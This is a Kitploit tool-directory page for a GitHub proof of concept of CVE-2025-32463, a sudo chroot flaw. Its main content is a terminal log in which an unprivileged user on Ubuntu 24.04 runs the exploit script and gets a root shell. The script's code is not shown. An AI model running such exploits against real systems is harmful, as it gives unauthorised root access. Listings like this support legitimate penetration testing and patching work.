Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-32463 | Kitploit
Tools/GitHubGitHub/sysmancer/cve-2025-32463
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubsysmancer/cve-2025-32463

CVE-2025-32463

View Repository
41 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Reference: https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot

Executing the PoC on Ubuntu 24.04.2 LTS server with Sudo v1.9.15p5, using an unprivileged user with no Sudo rules defined, results in a root shell outside of the chrooted environment.

lowpriv@prod:/CVE-2025-32463$ id uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv) lowpriv@prod:/CVE-2025-32463$ sudo -l [sudo] password for lowpriv: Sorry, user lowpriv may not run sudo on prod. lowpriv@prod:~/CVE-2025-32463$ ./sudo-chwoot.sh woot! root@prod:/# id uid=0(root) gid=0(root) groups=0(root),1001(lowpriv)

Download Tool